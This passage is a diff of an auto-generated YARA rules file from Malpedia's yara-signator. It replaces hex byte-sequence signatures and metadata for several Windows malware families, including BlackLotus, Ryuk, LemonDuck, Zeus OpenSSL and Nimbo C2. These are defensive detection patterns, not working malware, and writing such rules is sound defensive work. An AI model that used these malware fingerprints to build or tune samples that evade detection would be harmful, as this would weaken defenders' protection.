-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blacklotus_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pulsartea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pulsartea_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "69ee2c520b98a8fc48e03d945b290dd8e5b47d8c94f1557274f7c175df20640a"
+		logic_hash = "e947490c744b727dc99593cdd46b11ea245b6efcca5c96db4f4a6ac92a6b6da4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89387,32 +89379,32 @@ rule MALPEDIA_Win_Blacklotus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 884102 488d4904 4983e801 75dc 428d149dfcffffff 460fb60412 8d4201 }
-		$sequence_1 = { 7507 488b4b38 c601c3 488b1b 483bdf }
-		$sequence_2 = { 4883c104 e8???????? 488b4d30 0fb65103 0fb64102 48c1e208 }
-		$sequence_3 = { 44884301 88430b e8???????? 4c8bc6 488bd3 408acf }
-		$sequence_4 = { 2bcf ffc7 4103c9 6633544d08 8d41ff 6689544508 }
-		$sequence_5 = { 408a7c3c30 428d149de0ffffff 46320412 8d4201 }
-		$sequence_6 = { 4883ec30 418be8 488bfa 488bf1 488d15d41a0100 488b0d???????? }
-		$sequence_7 = { 7508 4d85c0 75ea 33c0 c3 1bc0 }
-		$sequence_8 = { ffc8 03c3 44888430d8070000 453bd1 72b9 8b15???????? ffca }
-		$sequence_9 = { 4c8d054e140100 488bd7 488bd8 e8???????? 488b05???????? }
+		$sequence_0 = { c745bc00000000 418bde 488b0f 488d55c0 e8???????? }
+		$sequence_1 = { 4889542420 488bcb e8???????? 4d8d870c020000 488d15a6500200 }
+		$sequence_2 = { 488d41f8 4883f81f 0f8789000000 498bc8 e8???????? 4c896e10 48c746180f000000 }
+		$sequence_3 = { 4c8d4d80 4533c0 8bd0 488d8d20060000 ff15???????? 440fb745a4 4533c9 }
+		$sequence_4 = { 418b048e 4133c1 8983a4000000 458842ff 4883ed01 }
+		$sequence_5 = { 488bc8 ff15???????? 85c0 0f84be000000 488b4c2440 488d442448 41b92c010000 }
+		$sequence_6 = { 48c74424480f000000 4088742430 498b442410 4883f810 0f823b0b0000 4883c0f0 41b804000000 }
+		$sequence_7 = { e8???????? 33db 8bf8 85c0 0f8454020000 4c8d25646e0100 448bf3 }
+		$sequence_8 = { 4c897f10 488bc7 48837f1810 7203 488b07 c60000 488b4f10 }
+		$sequence_9 = { c1e806 83e001 418986380c0000 83ff17 756d 0f57c0 448d4f4d }
 
 	condition:
-		7 of them and filesize < 181248
+		7 of them and filesize < 520192
 }
-rule MALPEDIA_Win_Xbtl_Auto : FILE
+rule MALPEDIA_Win_Lemonduck_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5435db05-6232-5daa-a834-a076fea3e65f"
+		id = "0687728c-af20-5db0-825f-c09419c968e6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xbtl_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lemonduck_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9ca9bf365c91027033dee3986f32faacddaba9038a823c9929d03b22f8c79417"
+		logic_hash = "98ef4bf0b78ddc5c7161294aca17f600a297dc9e3f0789809abaca00c16061d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89426,32 +89418,32 @@ rule MALPEDIA_Win_Xbtl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f8 03c0 03c0 50 52 8945fc e8???????? }
-		$sequence_1 = { 8a08 40 84c9 75f9 2bc6 8dbc05f4fdffff 89bde0fcffff }
-		$sequence_2 = { ff15???????? 8b07 8b4820 51 68???????? 8d542428 6a40 }
-		$sequence_3 = { 8b55e0 8b470c 8b4490f8 8945e0 85c0 742f 0fbf4304 }
-		$sequence_4 = { 81e200ff0000 33ca 8bd7 c1ea18 }
-		$sequence_5 = { 40 8945fc 3b4608 0f8c78ffffff eb09 8b55fc 8b7508 }
-		$sequence_6 = { 897004 8b5108 8bf2 c1ce08 81e600ff00ff }
-		$sequence_7 = { 8b8d8cfdffff 8b9598fdffff 50 8b8588fdffff 50 8b8590fdffff 57 }
-		$sequence_8 = { 8b07 68a00f0000 8d4c2448 51 89742448 }
-		$sequence_9 = { 8b530c 0fbfc8 837c8afc00 74e5 8b4308 3daa55ff7f }
+		$sequence_0 = { ff15???????? 8bc8 89834c010000 e8???????? 4863c8 48898b88000000 4883c420 }
+		$sequence_1 = { eb0f 488bd3 488d0deb090a00 e8???????? 33c9 85c0 480f44cb }
+		$sequence_2 = { c1e808 0bc8 41c1e808 c1e218 4133ca 440bc2 41894f10 }
+		$sequence_3 = { ff15???????? 488bf8 4885c0 0f841f020000 33c0 f0480fb13d???????? 488bf0 }
+		$sequence_4 = { 7404 893b eb34 3bfe 7330 2bf7 488d14bd00000000 }
+		$sequence_5 = { e8???????? e9???????? 488b8e50010000 488d85e8000000 4c8d8dd0000000 4889442420 4c8d85e0000000 }
+		$sequence_6 = { e8???????? 85c0 7419 41b80a000000 488d15eab90500 488bcb e8???????? }
+		$sequence_7 = { e8???????? e9???????? 664183780e03 0f85e0010000 488d1d8bee1500 4c8d3dacee1500 0f1f4000 }
+		$sequence_8 = { 75f7 8945c8 33c0 488945d8 488945e0 66448965e6 488b45e0 }
+		$sequence_9 = { ff5018 f6d8 1bdb 83c302 b978000000 e8???????? 488bf8 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 10011648
 }
-rule MALPEDIA_Win_Radamant_Auto : FILE
+rule MALPEDIA_Win_Forest_Tiger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9054a5c-bb68-56d9-b004-7795b422035b"
+		id = "3353c633-78cc-57c2-86be-460e3ac718ff"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.radamant_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.forest_tiger_auto.yar#L1-L145"
 		license_url = "N/A"
-		logic_hash = "c8bbb0af31c01f18c5c289ae1834ad1b53dc2920970c2b6e405a5699e0104750"
+		logic_hash = "fd0aad246be00ca230351bf440cc00646056cfe6bce27189395062caee48cc7c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89465,34 +89457,39 @@ rule MALPEDIA_Win_Radamant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45f0 f7d0 2345f4 09d0 0345c4 0345ec }
-		$sequence_1 = { 7519 8b45c4 890424 e8???????? 8b45f4 8985f4fdffff e9???????? }
-		$sequence_2 = { 8b5510 83c20e 8b45ec c1e808 8802 8b5510 83c20f }
-		$sequence_3 = { 31c2 8b45e8 c1e808 0fb6c0 0fb680b0094100 }
-		$sequence_4 = { 8901 8b4df4 83c128 8b55f4 83c208 8b45f4 83c024 }
-		$sequence_5 = { 8d85a4fcffff ff00 8d85b8fdffff 890424 e8???????? 3985a4fcffff }
-		$sequence_6 = { c7042400000000 e8???????? 83ec0c 8d85b8fdffff 890424 e8???????? 8985a4fcffff }
-		$sequence_7 = { 8b45f4 8b00 c1e810 0fb6c0 8b0485e02f4100 8b1495e02b4100 31c2 }
-		$sequence_8 = { 09d0 0345a8 0345f4 2d885b9528 8945f4 8d45f4 c10007 }
-		$sequence_9 = { c1e818 0fb6c0 8b0485b01b4100 8b12 31c2 }
+		$sequence_0 = { 833f01 0f94c0 84c0 7407 e8???????? eb05 e8???????? }
+		$sequence_1 = { 6bc930 8975e0 8db1c0084400 8975e4 }
+		$sequence_2 = { 4c8b4608 498bc0 488b4c2478 482bc1 }
+		$sequence_3 = { 6bc00c 56 ff90f0664300 59 }
+		$sequence_4 = { 4c8b4608 488b542478 4c2bc2 4983e0fc }
+		$sequence_5 = { 4c8b45c8 4c8b4dc0 f30f7f45d0 4c3955d0 }
+		$sequence_6 = { 6bc009 0fb68408c0724300 6a08 c1e804 }
+		$sequence_7 = { 4c8b4710 488bd7 488bcb 49ffc0 e8???????? eb0a }
+		$sequence_8 = { 4c8b45bf 488d1521350200 448bcb 488bc8 }
+		$sequence_9 = { 6aff ff15???????? 894604 85c0 7429 }
+		$sequence_10 = { 4c8b45ff 8b55db 488b4dcf e8???????? }
+		$sequence_11 = { 6aff 8d8df4fdffff 51 52 }
+		$sequence_12 = { 4c8b4750 488b33 448b7308 448b6f30 }
+		$sequence_13 = { 6aff 8d8dc8f4ffff 6880000000 51 }
+		$sequence_14 = { 6aff 8d942498010000 6880000000 52 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 709632
 }
-rule MALPEDIA_Win_Compfun_Auto : FILE
+rule MALPEDIA_Win_Ryuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c3d00d25-914d-52b8-aa23-a416041c458d"
+		id = "63f1751f-d521-53f6-9b97-173de48e208c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.compfun_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ryuk_auto.yar#L1-L403"
 		license_url = "N/A"
-		logic_hash = "8284624d97f6e1919129028ed727636c96197862138001108f45d962bbade24e"
+		logic_hash = "4db40c45399c6db29cb64a2d888825a95bd14e7ba242fbbfeb5e1735cc3c9e5b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89504,38 +89501,67 @@ rule MALPEDIA_Win_Compfun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 56 e8???????? 83c40c c7460c57202020 c70652656745 c746046e756d4b }
-		$sequence_1 = { c7460475705072 c746086976696c c7460c65676556 c74610616c7565 c6461500 8bc6 5e }
-		$sequence_2 = { c7460c62757465 c6461200 8bc6 5e 5d }
-		$sequence_3 = { 742d 53 8d85d8fdffff 50 a1???????? }
-		$sequence_4 = { c746144533442d c7461843343537 c7461c39323931 c7462036393245 c6462500 }
-		$sequence_5 = { e8???????? 59 50 57 ffd3 894650 85c0 }
-		$sequence_6 = { 83c40c c746086c655720 c70643726561 c7460474654669 }
-		$sequence_7 = { e8???????? 83c40c c706466c7573 c746046846696c c7460865427566 c7460c66657273 }
-		$sequence_8 = { 488b8424a0000000 ff5030 85c0 7508 }
-		$sequence_9 = { 837c2428ff 740a c744244401000000 eb08 }
-		$sequence_10 = { 488b842438010000 8908 488b842438010000 8b08 }
-		$sequence_11 = { ff15???????? 4c8bd8 488b442460 4c895848 }
-		$sequence_12 = { 8b9424a4000000 488b8c2498000000 488b442438 420fb60400 }
-		$sequence_13 = { 488b442420 48890424 488b0424 c70073766368 }
-		$sequence_14 = { 483904d1 750a 8b442438 89442420 }
-		$sequence_15 = { 488b442450 0fb600 3de9000000 740f }
+		$sequence_0 = { 68???????? 6a01 6a00 6814010000 }
+		$sequence_1 = { ff15???????? 85c0 7508 6a01 ff15???????? 68???????? 6a01 }
+		$sequence_2 = { 6a08 6a18 68???????? 68???????? 68???????? ff15???????? 85c0 }
+		$sequence_3 = { 81b8????????50450000 754c b90b010000 66398818000035 }
+		$sequence_4 = { b90b010000 66398818000035 753e 8b4508 }
+		$sequence_5 = { ff15???????? 85c0 7407 b801000000 eb0b eb04 }
+		$sequence_6 = { e8???????? 68e8030000 ff15???????? 68???????? e8???????? }
+		$sequence_7 = { b801000000 eb0b eb04 33c0 eb05 b801000000 }
+		$sequence_8 = { c1e100 817c0dd8ff000000 0f8696000000 ba04000000 6bc200 }
+		$sequence_9 = { 99 89459c 8955a0 8b55a0 3b55f8 0f870b020000 }
+		$sequence_10 = { eb09 8b45f0 83c001 8945f0 8b45f0 99 8b4d08 }
+		$sequence_11 = { 50 8b4de8 0fb6512c 52 e8???????? }
+		$sequence_12 = { c1e200 8b45fc c6041000 c745d800000000 c745dc00000000 c745e000000000 }
+		$sequence_13 = { ff15???????? b811000000 e9???????? e9???????? }
+		$sequence_14 = { 6a00 6814010000 ff7508 ff35???????? ff15???????? }
+		$sequence_15 = { ff15???????? 833d????????00 6a10 6a18 }
+		$sequence_16 = { 7407 48 85c0 7ff0 }
+		$sequence_17 = { ff15???????? b803000000 eb05 b805000000 }
+		$sequence_18 = { 751b ff35???????? ff35???????? 6a01 68???????? e8???????? }
+		$sequence_19 = { 2bf0 33c0 66890473 83ffff }
+		$sequence_20 = { 56 ff15???????? 8bcb 8d5102 }
+		$sequence_21 = { eb0b 8bc1 99 f7fe }
+		$sequence_22 = { 7212 81f9d0070000 770a 85d2 }
+		$sequence_23 = { 85d2 7714 7212 81f9d0070000 }
+		$sequence_24 = { e8???????? 488bc3 4883c430 5b c3 48895c2408 48896c2410 }
+		$sequence_25 = { f3a4 8d7afe 668b4702 8d7f02 }
+		$sequence_26 = { 68???????? 53 d1fe e8???????? 83c408 8d5002 }
+		$sequence_27 = { 4883c428 c3 48895c2408 57 4883ec30 8364242000 b908000000 }
+		$sequence_28 = { 0f9fc0 5d c3 8bff 55 8bec 8b4508 }
+		$sequence_29 = { d1fa 2bca 33c0 6689444bfe e9???????? }
+		$sequence_30 = { 488b7c2408 498bc1 c3 4053 4883ec20 8bc1 498bd8 }
+		$sequence_31 = { 6685c0 75f5 8d7bfe 2bd6 8d5f02 668b4702 }
+		$sequence_32 = { 2bd6 8d5f02 668b4702 83c702 6685c0 75f4 }
+		$sequence_33 = { 6685c9 75f5 2bf2 68???????? 53 d1fe }
+		$sequence_34 = { 7510 488bcb ff15???????? b802000000 }
+		$sequence_35 = { 4533c0 c744242003000000 ba00000040 ff15???????? 488bd8 ff15???????? }
+		$sequence_36 = { 8bc1 2bc2 d1e8 03c2 c1e806 6bc05a }
+		$sequence_37 = { 7516 66837f0254 750f 66837f0641 7508 }
+		$sequence_38 = { 488bf8 4885c0 7410 ff15???????? }
+		$sequence_39 = { 48897c2430 488d4c2440 c744242802000000 4533c9 4533c0 c744242003000000 ba00000040 }
+		$sequence_40 = { 8b5c3050 ff15???????? 41b900300000 c744242040000000 }
+		$sequence_41 = { e8???????? 488bcf ff15???????? 8d4301 e9???????? }
+		$sequence_42 = { ff15???????? 66833f4e 7516 66837f0254 }
+		$sequence_43 = { 41b900300000 c744242040000000 448bc3 488bd6 }
+		$sequence_44 = { 84c0 746c e8???????? 488d0d63080000 e8???????? }
 
 	condition:
-		7 of them and filesize < 402432
+		7 of them and filesize < 7450624
 }
-rule MALPEDIA_Win_Helauto_Auto : FILE
+rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b795cd97-f81e-5b0c-b86f-eb6142e4a506"
+		id = "d31ed497-e4a7-5163-b5e5-7492582406ac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.helauto_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_openssl_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "77b1dbe0537fbb57df2196994395215daf625d1b39e62bbfe2e9527b9343a123"
+		logic_hash = "16a4630d182e49d69e9e6276c110ddae0774c12808dbb665512c7a33855cd109"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89549,32 +89575,32 @@ rule MALPEDIA_Win_Helauto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8d7dc0 895dbc f3ab 8b4510 69c0f4010000 }
-		$sequence_1 = { 753b 6a08 be???????? 59 8d7d98 f3a5 }
-		$sequence_2 = { ff75f0 ff15???????? 8b45f4 8b7dec 2b4510 }
-		$sequence_3 = { 68???????? 8d85a8f9ffff 50 e8???????? 8d85a8f9ffff }
-		$sequence_4 = { 53 8d85a8f8ffff 68???????? 50 e8???????? }
-		$sequence_5 = { 50 6a1f ff75fc ffd6 8d45c8 57 50 }
-		$sequence_6 = { 53 53 6a01 53 8d8528feffff 53 }
-		$sequence_7 = { 59 0f85b3000000 53 6a08 }
-		$sequence_8 = { 6a01 58 c20c00 b8???????? e8???????? 81ec00010000 }
-		$sequence_9 = { 6a1f ff75fc 897dc4 ff15???????? 8b35???????? 804ddd01 }
+		$sequence_0 = { 8bf8 05fffeffff 4e 03c6 }
+		$sequence_1 = { 0181a8160000 837de000 7419 8b75e0 8b45f0 0fb7443002 8b75f8 }
+		$sequence_2 = { 2bc3 8bda 8b55c4 83c005 894304 8b45f0 2bd6 }
+		$sequence_3 = { 6a1c 8945f0 8845ff 8bfa 32c0 59 }
+		$sequence_4 = { 8bec 83ec10 53 56 57 8b3d???????? 33db }
+		$sequence_5 = { 83ec0c 56 57 8bf2 8bf9 e8???????? }
+		$sequence_6 = { 83c408 8b87bc160000 894df8 83f810 7530 8b4f14 }
+		$sequence_7 = { 743b 83ef50 7412 83ef75 742a }
+		$sequence_8 = { 89475c e8???????? 8b0f 33c0 394110 5f }
+		$sequence_9 = { 8b45fc 48 50 8d9694000000 8bce }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 4546560
 }
-rule MALPEDIA_Win_Fishmaster_Auto : FILE
+rule MALPEDIA_Win_Synflooder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85781cdb-ef0a-5ba4-9f1c-a71e1fb971a5"
+		id = "9b4db3a4-161f-5f48-96b1-18c835e76606"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fishmaster_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.synflooder_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "fa4353e268ca10ee73320d72c1e5a21f512b82d4c18bb38fa107cace5c168150"
+		logic_hash = "71981dc7d5e3732f6bffc2a9248cb281eeec7fbd198e397f9ba4db0beb4f7d0b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89588,71 +89614,71 @@ rule MALPEDIA_Win_Fishmaster_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b9e8030000 ff15???????? 4c89742450 48c74424580f000000 }
-		$sequence_1 = { 8d45fd 4863c8 460fbe0401 418d40bf 3c19 7706 }
-		$sequence_2 = { 7203 4c8b03 8d45ff 4863c8 }
-		$sequence_3 = { 488d0d25310000 0f57c0 488d5308 48890b 488d4808 0f1102 ff15???????? }
-		$sequence_4 = { 488bcb 41ffd5 90 488b5558 4883fa10 7234 }
-		$sequence_5 = { ba05000020 488bcb ff15???????? 488bcb ff15???????? c744243000010000 }
-		$sequence_6 = { 488d054d2a0000 c3 8325????????00 c3 48895c2408 55 }
-		$sequence_7 = { 4983f910 7203 4c8b03 8d45ff 4863c8 460fbe0401 418d40bf }
-		$sequence_8 = { 83f828 7309 33c9 ff15???????? cc }
-		$sequence_9 = { 4883f801 721c 488d4101 48894310 4883fa10 488bc3 7203 }
+		$sequence_0 = { 762a 56 e8???????? 8d0445f4f34000 8bc8 }
+		$sequence_1 = { 8be5 5d c3 8b35???????? b802000000 6a50 668944242c }
+		$sequence_2 = { 8bec 8b4508 ff34c580e44000 ff15???????? 5d }
+		$sequence_3 = { 0f8f0b010000 33f6 85db 7e1b 8bff e8???????? 0fbec0 }
+		$sequence_4 = { 8a13 0fb6ca 0fbe8910ee4000 85c9 }
+		$sequence_5 = { 897e70 c686c800000043 c6864b01000043 c74668f0e54000 }
+		$sequence_6 = { 03048d20fc4000 eb02 8bc2 f6402480 }
+		$sequence_7 = { 33c5 8945fc 8d8568faffff 50 6a02 ff15???????? }
+		$sequence_8 = { c7470640008006 8b44242c 50 ff15???????? }
+		$sequence_9 = { 897df4 85ff 75d1 53 e8???????? 8b45f0 }
 
 	condition:
-		7 of them and filesize < 812032
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Floki_Bot_Auto : FILE
+rule MALPEDIA_Win_Excalibur_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25c81d04-9abf-5940-8e55-7e5abeb99153"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.floki_bot_auto.yar#L1-L131"
+		id = "6324643e-ef25-5303-a7ee-e63ea03ca117"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.excalibur_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "e2f9df61c4df036b71f6882cf4c35419384506db07aa4de7d79fcad14d6710ad"
+		logic_hash = "59d59e89202157c635015f906929dcafdfae271957da35e098ac970aa56a977d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fe45ff 8a45ff 3a45fc 7285 fe45fe 8a45fe 3a4601 }
-		$sequence_1 = { 8bc6 8d74241c e8???????? 84c0 0f843f010000 8b442414 }
-		$sequence_2 = { 53 57 8bf8 8d45f8 50 33db }
-		$sequence_3 = { 8b4c2414 0fb713 83fa04 7516 663911 7507 8b4d10 }
-		$sequence_4 = { 50 53 ff35???????? 682d010000 e8???????? 83c418 }
-		$sequence_5 = { 50 e8???????? ff471c 015f14 8bc6 8b55fc e8???????? }
-		$sequence_6 = { bf???????? e8???????? ff75f0 84c0 7407 e8???????? eb08 }
-		$sequence_7 = { 8d45f4 50 e8???????? 6a09 6a00 8d45f4 50 }
-		$sequence_8 = { 744d 66391f 7448 8d4c2440 e8???????? 6a04 8d544444 }
-		$sequence_9 = { 84c0 744b 8b45f8 85c0 7414 ff75ec e8???????? }
+		$sequence_0 = { 8b4d08 33c0 663b88e4954300 740d 83c002 83f814 72ef }
+		$sequence_1 = { eb44 8d0492 c1e003 50 8b450c 50 8b00 }
+		$sequence_2 = { ffd0 83c408 894734 85c0 74de 8b5f14 }
+		$sequence_3 = { 83793800 7503 83cf04 83e717 89790c 857910 7407 }
+		$sequence_4 = { 33c4 89442420 8b4508 8944240c 8b450c 53 8b5810 }
+		$sequence_5 = { 0f43c2 8d8d4cffffff 8a0430 8885f8feffff ffb5f8feffff 6a01 }
+		$sequence_6 = { 6685c0 75f5 56 8d85d8f9ffff 2bd9 }
+		$sequence_7 = { 48 894604 8b06 40 8a48ff 8906 84c9 }
+		$sequence_8 = { 8945bc 8b45c8 8955e4 8b4020 c745e800000000 }
+		$sequence_9 = { 8d4c245c e8???????? 84c0 7433 68???????? 8d8c2490000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 1253376
 }
-rule MALPEDIA_Win_Bottomloader_Auto : FILE
+rule MALPEDIA_Win_Nimbo_C2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bdd8fe32-22cd-5060-a395-421a392e2bd1"
+		id = "2024fcd8-73ff-5d21-84a0-faeb93ed391a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bottomloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bottomloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimbo_c2_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b7681a0b4dfc773cac57468dbf0ac81e795dbff01a4fc0df233a09abd9d3252c"
+		logic_hash = "6b113df7136733641a874652387013b524eae7ec4a37b82db2a8e2b046f0820e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89666,32 +89692,32 @@ rule MALPEDIA_Win_Bottomloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488d3537d60700 488975c8 48c745c00e000000 488d4dc0 e8???????? 488d051bd60700 }
-		$sequence_1 = { e8???????? 4889c6 488d0579400600 488945c8 48c745c016000000 488d55c0 48899578feffff }
-		$sequence_2 = { 48897de8 e8???????? 4889c7 4885ff 746f 488d0ddcda0700 e8???????? }
-		$sequence_3 = { 4889bdd8fdffff 8b05???????? 65488b0c2558000000 488b14c1 bbf0090000 4c8b441a08 4c0b041a }
-		$sequence_4 = { 488975f8 488d55f0 488d8d70ffffff e8???????? 488d8d70ffffff e8???????? 488b9d60ffffff }
-		$sequence_5 = { ba43010000 488d0d57dc0700 e8???????? 4d8b542408 410fb63412 eb05 beff000000 }
-		$sequence_6 = { 488d0dc5800b00 4883ec20 e8???????? 4883c420 48898550ffffff 48899558ffffff 4c8b8550ffffff }
-		$sequence_7 = { c3 48895518 488d058b140b00 488945f8 48c745f027000000 488d55f0 8bce }
-		$sequence_8 = { 7442 4883fa02 7472 e9???????? 4d8bc4 488d5520 488d8db0feffff }
-		$sequence_9 = { 4531c0 ba86100000 488d0db8fd0500 e8???????? 4a8d0c0b 488b55f8 e8???????? }
+		$sequence_0 = { 7411 488b09 ba02000000 e8???????? c6430800 4883c420 5b }
+		$sequence_1 = { 48c7c0fcffffff 4885d2 7407 488b02 4883e804 488d4c0210 ba04000000 }
+		$sequence_2 = { 498d8c24b0000000 4889c2 e8???????? 4c89e0 41c68424b800000001 4883c420 }
+		$sequence_3 = { 4819db 4889c1 488985c0feffff e8???????? 83e313 488d8df8feffff 4881c306000200 }
+		$sequence_4 = { e8???????? 90 4883c438 c3 488b05???????? 48ff20 488b05???????? }
+		$sequence_5 = { 7f1c 488b8df8fbffff e8???????? 4889f2 4989c7 4885c0 7432 }
+		$sequence_6 = { 6605bb01 488b4c2450 0fb7d0 41b901000000 41b806000000 e8???????? 4889d9 }
+		$sequence_7 = { 4889c6 4d85f6 740d 4889fa 4c89f1 e8???????? eb07 }
+		$sequence_8 = { 4889c2 eb28 4d8d46ff 4c89e1 e8???????? 4c89f9 4889c2 }
+		$sequence_9 = { 57 56 53 4883ec20 488bb42488000000 4c8b32 4889f5 }
 
 	condition:
-		7 of them and filesize < 1955840
+		7 of them and filesize < 1141760
 }
-rule MALPEDIA_Win_Auriga_Auto : FILE
+rule MALPEDIA_Win_Unidentified_088_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "34318cf5-8b0c-5480-b67c-27a4f4ec96e2"
+		id = "b80a2357-b2b4-5f14-a95d-1e325e626d53"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga"
